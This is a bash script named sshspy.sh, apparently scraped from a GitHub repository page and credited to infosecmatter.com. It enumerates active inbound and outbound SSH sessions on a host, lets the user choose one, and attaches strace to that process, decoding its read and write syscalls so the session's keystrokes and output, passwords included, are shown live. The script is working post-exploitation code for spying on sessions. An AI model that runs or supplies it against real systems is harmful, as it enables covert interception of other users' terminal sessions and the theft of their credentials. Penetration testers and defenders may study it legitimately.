-
Notifications
You must be signed in to change notification settings - Fork 31
/
Copy pathsshspy.sh
44 lines (40 loc) · 1.3 KB
/
sshspy.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/bin/bash
# contact@infosecmatter.com
trap 'rm -f -- ${tmpfile}; exit' INT
tmpfile="/tmp/$RANDOM$$$RANDOM"
pgrep -a -f '^ssh ' | while read pid a; do echo "OUTBOUND $a $pid"; done >${tmpfile}
pgrep -a -f '^sshd: .*@' | while read pid a; do
tty="${a##*@}"
from="`w | grep ${tty} | awk '{print $3}'`"
echo "INBOUND $a (from $from) $pid"
done >>${tmpfile}
IFS=$'\n'; select opt in `cat ${tmpfile}`; do
rm -f -- ${tmpfile}
pid="${opt##* }"
wfd="[0-9]"
rfd="[0-9]"
strace -e read,write -xx -s 9999999 -p ${pid} 2>&1 | while read -r a; do
if [[ "${a:0:10}" =~ ^write\(${wfd}, ]] \
&& [ ${#wfd} -le 3 ] \
&& ! [[ "$a" =~ \ =\ 1$ ]]; then
echo -en "`cut -d'"' -f2 <<<${a}`"
elif [[ "${a:0:10}" =~ ^read\(${rfd}, ]] \
&& [ ${#rfd} -le 3 ]; then
echo -en "`cut -d'"' -f2 <<<${a}`"
elif [[ "$a" =~ ^read\((${rfd}+),.*\ =\ [1-9]$ ]]; then
fd="${BASH_REMATCH[1]}"
if [[ "$a" =~ \ =\ 1$ ]]; then
rfd="$fd"
fi
elif [[ "${a:0:10}" =~ ^write\((${wfd}+), ]] \
&& [ ${#wfd} -gt 4 ]; then
fd="${BASH_REMATCH[1]}"
if [[ "${a}" =~ \\x00 ]]; then continue; fi
if [[ "${a}" =~ \ =\ 1$ ]] || [[ "${a}" =~ \"\\x0d\\x0a ]]; then
wfd="$fd"
fi
fi
done
echo ">> SSH session ($opt) closed"
exit 0
done